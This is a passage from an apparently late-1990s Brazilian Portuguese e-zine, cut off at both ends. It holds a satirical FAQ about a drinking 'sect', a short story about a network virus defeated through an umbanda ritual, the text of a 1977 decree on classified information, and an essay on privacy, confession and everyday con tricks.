em corpo, (na maioria dos casos) e que por isso, num gesto nobre alivia nossa parcela de culpa. A isso se chama "expiar a culpa". Os estudiosos afirman que aqueles que se sentem aliviados com existencia do "outro" estao assumindo talvez ate alguma culpa, mas como a discussao nao foi (ainda) encerrada sobre o assunto, nada pode ser afirmado. Pergunta: Eu sou catolico/budista/crente/etc. Posso participar das reunioes? Resposta: Pode. Um porem: os devotos da OPUS-NIGHT sao unanimes em afirmar que o assunto da diferenca entre religioes nao pode em nenhuma hipotese ser sequer mencionado antes da comunhao sagrada em homenagem ao sangue do Deus BACO. Os mais severos exigem que nessa comunhao todos os copos contendo a sagrada bebida sejam esvaziados, no ato conhecido como "enxuga". Pergunta: Qual a razao da cerimonia conhecida como "ENXUGA"? Resposta: O ritual do enxuga e uma forma de nos nos purificarmos do mal causado pelos problemas do dia-a-dia. Conversar sobre a salvacao exige folego e uma mente pura em relacao ao obstaculo representado pela realidade. Ora, como diziam os sabios escoceses, a realidade e' apenas o resultado da ausencia cronica de alcool no sangue. Pergunta: Mas porque a necessidade de justamente alcool na cerimonia? Resposta: Pela mesma razao que o alcool e' usado para limpar a mesa onde discutimos nossas ideias. Pergunta: Os participantes da OPUS-NIGHT sao religiosos conservadores ou liberais? Resposta: A seita se divide entre os conservados e os conservadores, havendo varias dissidencias, como a dos renegados. Pergunta: Como saber a diferenca? Como saber qual e' o caminho mais adequado? Resposta: Os conservadores acreditam no paragrafo do ASPONE que prega: "Preguica e' prova de sabedoria Bebida e' uma questao de perseveranca Dinheiro, so' se ganhar na loteria" Os conservados se dividem entre os que se conservam em vodca, conhaque ou pinga cinquenta e um. E' tudo uma questao de gosto. Pergunta: Os participantes da Opus Night acreditam em Deus como nosso senhor e que Cristo veio aqui para nos salvar? Resposta: Uma grande parte acredita ciclicamente em Deus. Esses ciclos costumam coincidir com o fim do mes, antes do dia do pagamento. Cenas de desespero ocorrem e muitos rezam de forma comovente. Quanto a Jesus Cristo, ele esta' em todos nos, quando descobrimos que nao participamos de uma reuniao da OPUS-NIGHT. Muitos querem saber como e' o milagre da multiplicacao de vinho. As vezes acontece. Pergunta: Qual o caminho a OPUS-NIGHT aponta para a salvacao? Resposta: Lendo o livro do Sabio, descobrimos que antes de se encontrar o caminho para a salvacao, caminho para a salvacao e' necessario estar realmente perdido. Muitos sao os caminhos para a perdicao. Andar na linha pode ser perigosissimo, pois o trem pode matar instantaneamente. E'por isso que, como dito acima, o caminho da salvacao envolve uma discussao elaborada. Os que procuram o caminho sozinho sao chamados de Renegados. Pergunta: Qual e a visao do apocalipse para os elementos da Opus-NIGHT? Resposta: Isso depende. Houve um racha no grupo por conta disso e ha opini⌡es variadas sobre o assunto. Uma delas e que o final dos tempos deve acontecer logo, com a vinda da "Dolorosa" e o melhor a fazer e se entupir da "Sagrada Bebida" como forma de se prevenir contra o grande choque (isso adiaria o fim do mundo). Ja outro grupo pensa que o Apocalipse ja ocorreu ontem, antes de ontem ou semana passada, quando viu o resultado do: * jogo * cheque que caiu * aviso previo no emprego * etc Dentro desse ponto de vista, o negocio e partir para a reconstrucao. Ja um pessoal defende tambem que o mundo ja passou pela terceira guerra, o cataclisma ja ocorreu e somos apenas larvas de moscas devorando o cadaver. E' bom nao puxar essa questao por nunca se saber o que vai surgir. Com isto se encerra mais uma rodada de perguntas e respostas sobre a nossa grande alternativa para qualquer um que tenha duvidas quanto ao que responder para aquele que convidar para um bate-papo biblico sem fazer com que o outro se sinta ofendido com a recusa. Copyright: Aqueles que se interessarem pelo texto em ingles, aguardem pela traducao que deve estar pintando em breve. O responsavel por esse texto garante que reza toda a noite desde que conseguiu um emprego relacionado ao uso da INTERNET. Existe a possibilidade de que haja continuacao, se a acolhida for positiva. Exu tranca rede PC Universe version by Knight Rider [Image] gif da http://www3.br.freebsd.org/ tradutor: desconhecido, contribuicao da lista de piadas Nossa! Que e isso? Voce andou fucando aqui, Saci? Vem ca, menino! O boy atravessa o escritorio devagar. Tem uma perna so, sequela de sua curta carreira como surfista de trem, e toma cuidado pra nao enroscar a muleta nas dezenas de fios que pendem detras dos computadores instalados em cada mesa. - O que foi? Exu o que? O que voce andou aprontando por aqui, Rose? - Eu? Nada! Achei que tivesse sido voce. Na tela, em vez das linhas e colunas da planilha de gastos, estranhos sinais vermelhos sobre fundo preto. Um tridente de duas pontas, cruzes, o escambau. Coisa de macumbeiro? Embaixo, letras tambem vermelhas confirmando: "ETR - Exu Tranca Rede". Rosangela, secretaria bilingue, nao fazia ideia do que era aquilo. Saci tambem nem tinha como saber, mas o virus Exu Tranca Rede tinha, naqula tarde, paralisado quase toda a rede da Grande Sao Paulo. Devido a regulamentacao governamental e a taxacao excessiva, a rede paulistana era muito precaria, quase toda feita de ligacoes clandestinas. Partindo de algum ponto da Zona Leste, provavelmente da Mooca, o virus havia se aproveitado disto para alastrar-se, travando sistemas e destruindo dados. A noticia so apareceria na TV de noite, ai era tarde demais. - Ah, Rose, isso deve ser zoeira do pessoal da tecnica. Olha, restarta isso dai, pressiona F8, seleciona Safe Mode e ve no que da. Eu nao posso ficar por aqui. Ja ta na minha hora, to indo nessa. Saci fugiu rapidinho pro elevador, deixando Rosangela atonita, olhando para aquilo. Era a maior roubada ficar resolvendo os pepinos da Rose, ela parecia que nunca tava entendendo direito. Certa vez, tinha apagado um hard disk inteiro tentando ejetar o CD interativo do Fabio Junior. Embora em menor grau, o pessoal do escritorio era todo meio tapado nesse aspecto. Mesmo o pessoal da tecnica sabia so comprar e instalar pacotes prontos. Quando dava uma zica que nao tava prevista no manual, era um deus-nos-acuda. Saci sempre conseguia dar conta do recado. A computacao tinha virado uma coisa totalmente fechada, hermetica. Ninguem mais programava, tava tudo pronto. So a camada mais pobre da populacao, pilotando maquinas que eram verdadeiros Frankensteins, tinha jogo de cintura. Saci nao era excecao. O seu velho Dual Pentium MMX 200, todo detonado, ainda rodava uma copia do Windows 2001; ele tinha que fazer verdadeiras magicas pra manter aquele troco no ar. O novo secretario de seguranca ja havia comentado nas paginas amarelas da Veja: "Os ultimos hackers sao a baianada". E era por isso que as empresas ainda contratavam boys. Ninguem mais precisava ir ao banco, nem levar documentos de um lado prara o outro, e claro. Mas, quando a porca torcia o rabo, so um office-boy para resolver. - Ai, Saci! Ai! Corre aqui! - Calma, Damasio. O que aconteceu? - Eu tava fazendo uma fezinha aqui no TeleBicho que nem voce ensinou quando apareceu uma coisa do demo! Cruz-credo! Damasio era o porteiro do edificio onde Saci trabalhava. Na sua mesinha, no saguao, tinha um terminalzinho onde ele fazia o controle dos visitantes. Era evangelico, mas nunca tinha se interessado em perguntar ao pastor se Jogo do Bicho era pecado. Pelo sim, pelo nao, todo dia acessava a home page clandestina do TeleBicho (http://www.castor.bicho.com) pra ver se dava alguma coisa. Agora, diante daquele sinal demoniaco, suava frio. Tinha certeza que era o capeta vindo a Terra para puni-lo. Numa mao segurava a Biblia; na outra, o manual. Saci ficou chateado. O pessoal da tecnica exagerou. Aquilo era sacanagem. - Que capeta, que nada, Damasio. Isso dai e zoeira do pessoal la de cima. - De cima nada, menino! E de baixo! Isso dai e sinais do inferno! Ai, meu Deus! Eu sabia que eu tinha que gastar menos em vicios e dar o dinheiro pra Jesus, que nem o pastou falou! - Nao, nao e nada disso. Pra fazer o capeta sumir faz que nem eu ensinei: Iniciar, desligar, reiniciar o computador. Isso. Agora, da F8 rapidinho e entra em Safe Mode. Tenho que ir, mas amanha dou uma olhada com calma pra ver esse seu capeta. Antes que alguem mais aparecesse com aquela chateacao, Saci saiu pela porta de vidro. O predio onde trabalhava ficava na Berrini. Na virada do ano 2000, os paulistanos tinham eleito aquela avenida como o simbolo da cidade. Cada cidade com o simbolo que merece. Imensos edificios de vidro espelhado disputavam lugar com a favela que, ao contrario do plano original e todas as tentativas anteriores, nunca tinha sido erradicada e agora ocupava os espacos que podia. De um certo modo, aquele lugar era a cara de Sao Paulo; ja fazia algumas decadas que casa terrea era curiosidade historica. Saci esperava no ponto. Passava um pouco das seis, mas naquela epoca a hora do rush ja nao existia mais. O transito era o mesmo das cinco da manha ate mais ou menos as dez da noite. Entre os microcarros coreanos, carroceiros transportando a feria de papelao do dia. Ali na frente, uma charrete puxada por um pangare fechava uma faixa de transito inteira. O bicho tinha empacado e estava sendo chicoteado impiedosamente, sob buzinas e xingamentos dos motoristas. Saci conseguiu embarcar no quarto onibus certo que passou. A galera tava pouco se lixando se ele usava muleta ou nao. Ninguem nunca lhe cedia a vez. Ate a Vila Joaniza II, onde morava, eram tres conducoes. Ao lado do cobrador, um cara brincava com um Game Boy VR. Parecia um imbecil, apalpando o ar. Quase tomou um tapa quando, sem querer, passou a mao na bunda de um negao que viajava de pe. Muitos passageiros, de microHDTV na mao, assistiam o teipe do jogo do Corinthians (0x0 com o Fluminense). Saci ficou assistindo por cima do ombro de um cara e o tempo ate que passou rapido. - o Saci! Chega mais. Escuta aqui, cara, o que e que voce andou armando com a sua tia? Esse negocio de exu fudeu com a minha base de dados. Isso nao fica assim nao! Quando Saci chegou a Vila Joaniza II, ja estava escuro. Do lugar onde ele descia do onibus ate a sua casa eram oito quarteiroes a pe. A rua era de terra; nao havia calcada. As casas por ali eram uma mistura de barracos com casinhas de alveraria. Dos postes pendia um emaranhado incrivel de fiacao; a maioria daquilo era fibra otica. As antenas nos telhados formavam uma verdadeira floresta. Aqui e ali, emissores de microondas. Na rua, a molecada improvisava uma pelada com uma bola meio murcha. Quem estava esperando por Saci no meio do caminho era Wesley, o traficante local. Por ali todo mundo conhecia Saci e tambem a sua tia, a Mae Jurema, que tinha um terreiro de umbanda na regiao. Quando Wesley viu o computador onde estavam cadastrados seus clientes travar daquele jeito, sabia de quem suspeitar. Esperava por ele encostado na porta de um bar. Ali por perto, tres de seus "associados" nem faziam muita forca pra ocultar as Uzis por baixo de jaquetas estampadas com logos de times da NBA. Saci explicou cuidadosamente que nao tinha nada a ver com aquilo, e que o mesmo havia inclusive acontecido na firma onde ele trabalhava. Wesley nao acreditou muito, mas como era Saci quem resolvia todos os paus do seu sistema e mantinha a coisa funcionando, nao havia muita saida. Recomendou a Saci que "ficasse ligado"; Saci prometeu dar uma geral no seu OS no dia seguinte e deu o fora. Aquela historia estava ficando muito, muito esquisita. Definitivamente nao era uma brincadeira do pessoal da tecnica do seu escritorio; ele precisava dar uma olhada naquilo. E sabia quem poderia dar uma forca com essas coisas de exu. Por sorte o terreiro da tia Jurema nao era muito fora do caminho da sua casa. - Menino, a gente tava te procurando! Sabe o que... - E, eu sei, eu sei. Foi o Exu Tranca Rede, ne? Keyla tinha corrido pra encontrar Saci no meio da rua. Era uma mulata muito bonita que ajudava Mae Jurema a manter tudo em ordem e operava o computador do terreiro. Naturalmente, estava toda de branco. Estava preocupada com a possibilidade de ter perdido o cadastro das entidades que baixavam no terreiro. Saci nao perdeu tempo, foi direto falar com a tia. Jurema era cega, e o seu lugar favorito era num canto, num sofa detonado. Ficava de olhos semicerrados e nao parava de murmurar e resmungar coisas baixinho para si mesma. Como era velha e muito gorda, raramente levantava dali. Keyla cuidava para que todas as suas ordens fossem executadas e lhe trazia as refeicoes. Para muitos, Mae Jurema estava simplesmente gaga, mas quem tivesse um pouco de paciencia geralmente se convencia do contrario. Assim que Saci chegou, ela o chamou para perto com gesto. Nem o deixou falar nada. - Meu fio, to sabendo, me contaram. E Exu que atravessou, ne? As coisa tao parada, nao flui. Conheco bem. =CA! Voces acha que essas coisa de computador e novidade, e nada. E tudo igual, conheco bem. As coisa de cima sao igual as de baixo e e Exu que faz a ligacao. Ele e que abre os caminho, liga os outros mundo com o nosso. =CA! Voces acha que essas coisa de computador nao tem caminho, mas e tudo igual. As rua do computador, as encruzilhada, ta tudo ai nessas rede e e Exu quem rege, ele sim. Mas as pessoa nao tem respeito, e agora Exu ta contrariado. =CA! Conheco bem. Tem que ter respeito. Vamo falar com ele; vamo despachar. Por oferenda, por ebo, ai ele acerta as coisas e faz fluir o que ta bloqueado. E Exu quem tem o poder pra fazer isso. =CA! Saci nao ficou muito convencido, mas de qualquer modo seria legal ver o que dava pra fazer no sistema da tia Jurema. Era quase tao bom como o seu, e ele nunca se separava do floptical onde guardava os seus utilitarios. A mesa onde ficava o computador foi mudada para perto da porta do terreiro, onde fica a Casa de Exu. Enquanto Saci restartava o sistema com um OS alternativo, o terreiro era preparado. Embarabo, ago, mojuba. Embarabo, ago mojuba Omode co eko, Embarabo, ago mojuba. O quadro era, no minimo, curioso. No centro de tudo, Saci operava um computador sem a tampa, todo remendado com silvertape. A unica luz vinha do monitor, uma velha matriz de cristal liquido, e de dezenas de velas brancas. Nos lados do computador e do monitor haviam sido riscados pontos com pemba vermelha. A mesa, coberta por um pano vermelho com sinais brancos. Em volta, as oferendas: Marafa, cidra e vinho branco em pequenas cumbucas de barro; panelas com farinha de mandioca, mel e dende; charutos acesos. Muitas folhas de erva espada e folhas de manga. Essencias de mirra, rosa e sumo de arruda tornavam o ar dificil de respirar. Pessoas de branco tocavam, em atabaques, o ponto do exu; cantavam e dancavam sincopadamente. Exu Ona, Exu Lona, Mo gi re lo de Elegbara, Legbara, ie ie Exu Ona, ke wa o! Saci logo percebeu que combater o virus diretamente dava pouco resultado. A melhor estrategia seria criar um programinha que funcionasse como "oferenda", quase uma isca. Algo que atraisse o virus, satisfazendo os seus requerimentos, e desse modo o neutralizasse. Nao foi nada facil. O ritual durou ate o nascer do sol; algumas pessoas entravam em transe, outras caiam no chao, extenuadas. Saci, alheio a tudo, batia rapidamente no teclado e, vez ou outra, dava ordens secas para o reconhecedor de voz. Tinha que preparar o anti-virus com os seus programas dando pau e desligando-se inesperadamente, acusando "Este programa executou uma instrucao ilegal e sera finalizado". Passava das seis da manha, e o batuque ja havia enfraquecido bastante, quando a oferenda subitamente foi aceita. Saci rapidamente copiou o codigo basico do virus para um floptical e ejetou. Em poucos segundos, o sistema foi liberado pelo Exu Tranca Rede. A conexao estava aberta. Obedecendo as suas instrucoes, o anti-virus de Saci comecou a replicar-se pela rede. Da Vila Joaniza II para o backbone de Diadema, e dali pros sistemas industriais do ABC. Mas disso Saci nao podia saber, o seu programa era impossivel de ser tracado. No dia seguinte os boletins dariam a noticia que o virus Exu Tranca Rede havia sumido tao misteriosamente quanto havia aparecido. - Eu nao te disse? Jesus e poder! Satanas nao saia daqui do meu computador de jeito nenhum, ai eu orei, orei com fe e, de manha, quando eu cheguei, o demo ja tinha exorcizado. O poder de Jesus conquista tudo! Saci estava chegando, atrasadissimo, ao trabalho. Estava com olheiras profundas, tinha passado a noite em claro. Fez um sinal com mao para Damasio, nao estava interessado naquele papo de crente. Nao naquela hora. Ele teve uma noite realmente dura. No terreiro da Mao Jurema, escondido num canto do altar, tinha um disco floptical dentro de um pote vazio de maionese. A tampa tinha um cruz tracada e havia sido lacrada. Ali estava o primeiro cramulhao da era digital. REGULAMENTO PARA SALVAGUARDA DE ASSUNTOS SIGILOSOS (decreto no 79.099 - 6/01/77) Capitulo 1 DISPOSI╟╒ES PRELIMINARES Art. 1o As normas estabelecidas no presente Regulamento tem por finalidade regular o trato de assuntos sigilosos tendo em vista sua adequada seguranca. Art. 2o Para os fins desse regulamento serao consideradas as seguintes conceituac⌡es: Acesso: possibilidade e/ou oportunidade de obter conhecimentos de assuntos sigilosos. ┴rea Sigilosa: area em que se situam instalac⌡es, edificac⌡es ou imoveis de qualquer tipo, ou somente parte deles, que requeira a adocao de medidas especiais em proveito da seguranca de assuntos sigilosos que nela sejam tratados, manuseados ou guardados. Assunto Sigiloso: e aquele que, por sua natureza, deva ser de conhecimento restrito e, portanto, requeira medidas especiais para a sua seguranca. Classificar: atribuir um grau de sigilo a um material, documento ou area que contenha ou utilize assunto sigiloso. Credencial de seguranca: certificado, concedido por autoridade competente, que habilita a pessoa a ter acesso a assunto sigiloso. Custodia: responsabilidade pela seguranca de assunto sigiloso, decorrente da posse de material ou documento sigiloso. Documento Sigiloso: documento impresso, datilografado, gravado, desenhado, manuscrito, fotografado ou reproduzido que contenha assunto sigiloso. Grau de Sigilo: gradacao atribuida a um assunto sigiloso, de acordo com a natureza de seu conteudo e tendo em vista a sua conveniencia de limitar sua divulgacao αs pessoas que tenham necessidade de conhece-lo. Investigacao para credenciamento: investigacao feita com o proposito de verificar se determinada pessoa possui os requisitos indispensaveis para receber Credencial de Seguranca. Material Sigiloso: toda materia, substancia ou artefato que, por sua natureza, deva ser do conhecimento restrito, por conter e/ou utilizar assunto sigiloso. Necessidade de Conhecer: e a condicao, inerente ao efetivo exercicio de cargo, funcao ou atividade, indispensavel para que uma pessoa, possuidora da Credencial de Seguranca adequada, tenha acesso a assunto sigiloso. Visita: pessoa cuja entrada foi admitida, em carater excepcional, em area sigilosa de organizacao privada ou do Governo. Capitulo II CLASSIFICA╟├O DOS ASSUNTOS SIGILOSOS Art. 3o Os assuntos sigilosos serao classificados, de acordo com a sua natureza ou finalidade e em funcao da sua necessidade de seguranca, em um dos seguintes graus de sigilo: * Ultra-secreto * Secreto * Confidencial * Reservado Paragrafo unico. A necessidade de seguranca sera avaliada mediante estimativa dos prejuizos que a divulgacao nao autorizada do assunto sigiloso poderia causar aos interesses nacionais, a entidades ou individuos. Art. 4o A cada grau de sigilo correspondem medidas especificas de seguranca, entre as quais se incluem as limitac⌡es para o conhecimento de assunto sigiloso. $1o O grau de sigilo "Ultra-secreto" sera atribuido aos assuntos que requeiram excepcionais medidas de seguranca, cujo teor ou caracteristicas so devam ser do conhecimento de pessoas intimamente ligadas ao seu estudo e/ou manuseio. $2o O grau de sigilo "Secreto" sera atribuido aos assuntos que requeiram elevadas medidas de seguranca, cujo teor ou caracteristicas possam ser do conhecimento de pessoas que, sem estarem intimamente ligadas ao seu estudo e/ou manuseio, sejam autorizadas a deles tomarem conhecimento, funcionalmente. $3o O grau de sigilo "Confidencial" sera atribuido aos assuntos cujo conhecimento por pessoa nao autorizada possa ser prejudicial aos interesses nacionais, a individuos ou entidades ou criar embaraco administrativo. $4o O grau de sigilo "Reservado" sera atribuido aos assuntos que nao devam ser do conhecimento do publico em geral. Art. 5o Os assuntos sigilosos serao classificados de acordo com o seu conteudo e nao necessariamente, em razao de suas relac⌡es com outro assunto. $1o Sao assuntos normalmente classificados como "Ultra-secreto" aqueles da politica governamental de alto nivel e segredos de Estado, tais como: * negociac⌡es para aliancas politicas e militares; * hipoteses e planos de guerra; * descobertas e experiencias cientificas de valor excepcional; * informac⌡es sobre politica estrangeira de alto nivel. $2o Sao assuntos normalmente classificados como "Secreto"os referentes a planos, programas e medidas governamentais, os extraidos de assunto "Ultra-secreto" que, sem comprometer o excepcional grau de sigilo do original, necessitem de maior difusao, bem como as ordens de execucao, cujo conhecimento previo, nao autorizado, possa comprometer suas finalidades. Poderao ser "Secretos", entre outros, os seguintes assuntos: * planos ou detalhes de operac⌡es militares * planos ou detalhes de operac⌡es economicas ou financeiras; * aperfeicoamento em tecnicas ou materiais ja existentes; * informes ou informac⌡es sobre dados de elevado interesse relativo a aspectos fisicos, politicos, economicos, psicossociais e militares nacionais ou de paises estrangeiros; * materiais de importancia nos setores de criptografia, comunicac⌡es e processamento de informac⌡es. $ 3o Sao assuntos normalmente classificados como "Confidencial" os referentes a pessoal, material, financas etc.. cujo sigilo deva ser mantido por interesse do Governo e das partes, tais como: * informes e informac⌡es sobre atividades de pessoas e entidades: * ordens de execucao cuja difusao previa nao seja recomendada; * radiofrequencias de importancia especial ou aquelas que devam ser freqⁿentemente trocadas; * indicativos de chamadas de especial importancia que devam ser freqⁿentemente distribuidos; * cartas, fotografias aereas e negativos, nacionais e estrangeiros, que indiquem instalac⌡es consideradas importantes para a Seguranca Nacional. $ 4o - Sao assuntos normalmente classificados como "Reservado" os que nao devam ser do conhecimento do publico em geral, tais como: * outros informes e informac⌡es, * assuntos tecnicos; * partes de planos, programas e projetos e suas respectivas ordens de execucao; * cartas, fotografias aereas e negativos, nacionais e estrangeiros, que indiquem instalac⌡es importantes. Art.6o O grau de Sigilo "Ultra-secreto" so podera ser atribuido pelas seguintes autoridades: * Presidente da Republica; * Vice-presidente da Republica * Ministros de Estado; * Chefe do Estado-maior da Armada, do Exercito e da Aeronautica. Art. 7o Alem das autoridades estabelecidas no art. 6o, podem atribuir grau de sigilo: I- "Secreto", as autoridades que exercam func⌡es de direcao, comando ou chefia. II- "Confidencial" e "Reservado", os Oficiais das Forcas Armadase Servidores Civis, estes de acordo com regulamentacao especifica de cada Ministerio ou orgao da Presidencia da Republica. Art. 8o A autoridade responsavel pela classificacao de um assunto sigiloso, ou autoridade mais elevada, podera altera-la ou cancela-la, por meio de oficio, circular ou particular, dirigido αs autoridades que tenham a respectiva custodia. Paragrafo unico. Na presidencia da Republica, o Ministro Chefe do Gabinete Militar e o Ministro Chefe do Gabinete Civil poderao alterar ou cancelar a classificacao de qualquer documento que, no interesse da administracao, tenha que ser publicado no Diario Oficial. Art. 9o A classificacao exagerada retarda, desnecessariamente, o trato de assuntos e deprecia a importancia do grau de sigilo. Desse modo, o criterio para a classificacao deve ser o menos restritivo possivel. Aquele que conta seus segredos... Derneval R.R. Cunha Diz adeus a sua liberdade. (proverbio arabe) No numero anterior do Barata Eletrica, havia uma serie de noc⌡es do porque a pessoa deve preservar algo da privacidade. Mas nao ha uma dica de como fazer isso. Pois e algo dificil. Nao ha como fugir do fato de que existimos. Se isso e verdade, entao temos nome, idade, data de nascimento, local, escolaridade, profissao, hobby, condicao financeira, experiencia anterior com varios tipos de situac⌡es, como inveja, ciume, ganancia, ou topicos como socialidade, religiao, etc, etc.. Isso parece uma discussao sobre Curriculo Vitae, mas o lance e que se a pessoa vive, interage. E essa interacao fica marcada na memoria. Como todo mundo fala "quem nao se recorda do passado esta condenado a repeti-lo", o duro e saber o que e recordado por quem. Se eu tenho um amigo, guardo uma visao dele. Melhor falar de amiga, assim nao fica a impressao de que estou falando besteira. Essa amiga guarda uma visao de mim, mas provavelmente nao vai se recordar tanto de como ela era enquanto estava comigo. E vice-versa. Eu nao vou me recordar de como fui besta em companhia dela. A maior tendencia e guardar e recordar aquele que que esta proximo. Recordar como somos com alguem, isso muitos nao dao a menor importancia. No tempo da MPB (minha infancia) dava nauseas ouvir dois ditados: "conhece-te a ti mesmo" e "dize-me com quem andas e te direis quem es". Era um jeito muito facil de fingir cultura e inteligencia (hoje, deve haver outras formas de forjar a mesma coisa). Mas analisando a primeira parte, e muito dificil a pessoa se analisar, mesmo que descubra a importancia de fazer isso. E' que pode custar caro, principalmente quando se utiliza profissionais do ramo, vulgo psiquiatras ou psicologos. Com efeitos colaterais, que e o sentimento de culpa e um medo absurdo de ficar sem grana (conheci muitos nessa condicao) para prosseguir no caminho do auto-conhecimento (com ajuda profissional). Isso, ate que a pessoa chega a conclusao que a grande diferenca entre o conjunto de medicos, psicologos, essa gente que trabalha num sanatorio e os pacientes, e que estes nao tem a chave.. Bom, tirando a piada, e necessario outra pessoa para que possamos nos enxergar perante a sociedade. Mesmo o espelho so pode dar uma visao invertida da nossa imagem. E se outra pessoa te analisar ou recordar seus atos, a memoria dela pode estar afetada por trocentas coisas. Um homem e uma mulher. Se for uma namorada no inicio do namoro, qualquer coisa que ela vai se lembrar do cara num determinado momento e que ele e lindo. Se for no final do relacionamento, qualquer coisa que o cara fizer e porque ele e um grosso, feio, mal-educado, etc.. Tem gente que nunca parou para pensar nesses detalhes e pensa que parecer bonito ou feio tem a ver com vestir uma roupa de domingo. Mas considerando um intervalo de tempo menor. Uma conversa com um desconhecido. Olha so como existem detalhes na relacao mais simples do mundo. Uma conversa entre duas pessoas acontece por conta de varias coincidencias. Ambos falam a mesma lingua. Ambos estao interessados em um dialogo. Ambos estao interessados em falar e ouvir. Mas depois do momento inicial, em que ja se conversou o obvio, a coisa pode progredir ate varias camadas de profundidade. Tipo conversa de familia que tem adolescente, na hora das refeic⌡es.. uma opiniao sobre a sopa pode terminar num palavrorio sobre o aborto ou um interrogatorio sobre a situacao escolar. Ou pode ser como um bate-papo num CHAT ou IRC da vida em que a pessoa acaba se dando conta de que realmente esta fazendo isso ou aquilo errados, que detesta o emprego, a pessoa com quem esta morando, etc, etc.. E' , pode-se descobrir como e bom descobrir alguem novo, nossa propria identidade. A igreja sempre fez o maior sucesso com isso, tem um negocio chamado "confissao". Um segredo entre o padre e o "pecador" que o procura. Leon Eliachar, famoso humorista mineiro, tinha um proverbio (nao sei se ainda me lembro), onde dizia ter perdido a conta do numero de vezes que foi enganado: e uma sensacao maravilhosa poder confiar no ser humano... e.. e o pior e que e mais facil ainda confiar num estranho do que em alguem da propria familia, as vezes. Sim, porque a familia so conhece uma parte da pessoa. E uma pessoa e produto de um amontoado de influencias, experiencias, amizades, coisas especificas de idade, etc, que torna dificil que duas pessoas morando juntas realmente saibam tudo que a outra pessoa esta pensando. Parto do principio que quem conseguiu seguir meu ponto de vista ate aqui talvez entenda mais tarde onde vou chegar. Diga-me com quem andas e eu te direi quem es. Temos amigos que nao sao conhecidos entre si. As vezes. E conhecemos gente que nao queremos que ninguem saiba que conhecemos. As pessoas sao muito menos racionais do que imaginam. Embora o papel do confessionario tenha sido substituido pelo terapeuta, assistente social, etcs, o mais comum e a pessoa procurar quem esteja disposto a ouvir, nao importa quem. Nao importa o assunto, nao importa o local. Em alguns casos, a conversa nao e mais do que um monologo disfarcado. E' uma pessoa que quer falar para uma outra que nao se importa de ficar ouvindo. Tudo depende do assunto e da disposicao. Tudo depende da ausencia de fatores que inibam o bate-papo. Tem muita gente que se desinibe total na frente de um computador na internet porque a principio, nao ve a cara de sono do sujeito do outro lado, nao ve o rosto cheio de espinhas, aquela cara de "to na frente do micro desde ontem de manhaaaaaa e ainda nao escovei os dentes hoje..." E' um barato. A pessoa e aquilo que digita. Pode brincar de romantico e morrer de dar risada, porque como a pessoa do outro lado vai saber? Dai aparece um historia dessas: Casal que se conheceu pela Internet some [..]Os dois se comunicaram pela Internet durante 30 dias, ate final de setembro, em media oito horas por dia. Silva apresentou-se pelo computador como um rico fazendeiro,enviando como "provas" fotos de touros, uma fazenda e um aviao,alem de muitas flores e declarac⌡es de amor.[..] Ex-modelo, a vendedora enviou antigas fotos suas, de uma epoca em que estava 20 quilos mais magra. "Antes de se encontrarem, ela explicou que estava mais gordinha. Ele entendeu e nao se decepcionou", disse a mae de Carla.[..] (Folha de Sao Paulo, sexta, 17 de outubro de 1997 RUBENS VALENTE da Agencia Folha, em Campo Grande PAULO MOTA da Agencia Folha, em Fortaleza ). O mais dificil pode ser estabelecer a confianca inicial. A maioria nao entende ou classifica isso como "papo de vendedor" e nao entende como que podem acabar caindo numa situacao bem pior, por coisa a toa. Por exemplo, estava com uma turma, num bar da periferia, altas horas da noite. Aparece uma patrulha. Todo mundo que e adolescente ja passou por uma situacao semelhante a da favela Naval, mas era apenas uma blitz, sem aquela coisa toda. Todo mundo foi apenas revistado, etc, etc.. Quando tudo parecia ja que ia terminar, os outros policiais estavam indo embora, um deles, bem baixinho, parecia ate que nao fazia parte, foi bater um papo com um amigo meu, mais afastado. E conversava legal, sorria, pedia desculpas, falava que infelizmente era o servico deles, etc, falou da vida dele, que tinha namorada, que tambem gostava de farrear, quando parecia que os dois sorrindo juntos, trocando piadas e falando de farras, o policial veio com um lance de que ele fumava "daquele tabaco" e .. sorrindo (porque os dois estavam rindo) sugeriu que o amigo tambem fumava.. "Isso e minha vida pessoal, nao vou dizer" O policial fez entao um discurso que os literatos ate classificariam de inflamado, exaltado, sobre trocentas qualidades que a mae, a avo, a bisavo do sujeito ofereciam ao publico, num bordel da periferia. Do pai, do avo e bisavo comentou algo sobre tradicao e contribuic⌡es para a cultura gay de Campinas, todo um palavrorio meio desperdicado. Meu amigo cobriu a boca com mao e fechou os olhos. E nao falou mais nada, ate a viatura ir embora. Explicacao: responder nesse caso seria desacato a autoridade. Ia acabar na delegacia. Pelo menos teve presenca de espirito, porque se tivesse, somente para ser educado, admitido algum dia ter fumado "tabaco", poderia ter sido obrigado a dizer quem forneceu. Aquele policial deveria ser um especie de especialista nesse tipo de "confissao" e a noite poderia ter terminado muito mal, talvez igual aquela de Diadema. Existe o fator bebida. "In vino veritas" A verdade esta no vinho. Com a dose certa de alcool na cabeca, todo mundo conta tudo. E todo mundo pensa que e so alcool que embriaga. Uma pessoa que esteja muito alegre porque o Timao (ou o Palmeiras ou o Vasco) ta na frente, tambem fica vulneravel. A grande chave do sucesso e a sinceridade. E como tem gente que consegue falsificar "sinceridade". As vezes nao e tao facil. Mas ai a outra pessoa pode tambem apelar para o lado nobre de cada um, como ja descrevi acima. Numa banca de revistas 24 horas na Paulista, percebi o seguinte truque: o dono vendia revista estrangeira por menos da metade. Existem varias bancas em Sao Paulo onde e possivel isso. Mas na hora do sujeito puxar a nota de 10 R$ pra pagar 4 R$, o vendedor distraidamente puxava conversa com um ciclano ou beltrano. Na hora de dar o troco fingia "voce me deu 5, nao foi?" O comprador tava tao feliz da vida de ter conseguido uma pechincha que as vezes ate aceitava o prejuizo. Vi isso 2 vezes acontecer e tomei partido do fregues. O vendedor soltou aquele discurso "voce acha que vou me sujar por conta de 5 R$?" Mas ja vi esse truque ser feito com gente em Minas, Rio de Janeiro, Porto Alegre. Uma vez ate por conta de 0,10. A pessoa fica tao alegre em poder gastar com alguma coisa que esquece que, se puder, tem vendedor que prefere nao dar o troco. E de tao alegre que esta, a pessoa nao se anima a fazer escandalo, para nao passar por pobre. Restaurante, no Rio de Janeiro, roubava na conta direto, ate que virou "in" conferir a conta. Isso nos anos 80, hoje nao sei. E' , pode se dizer que "colecionei" essas historias para contar aqui. Qualquer pessoa que viva o suficiente acaba aprendendo como se defender de algumas malandragens. Mas o problema e nao perceber que nao e de dinheiro que falei no paragrafo anterior. E' do medo que a pessoa tem de ser contra algo errado, apenas porque isso pode gerar constrangimento. E' de repente estar 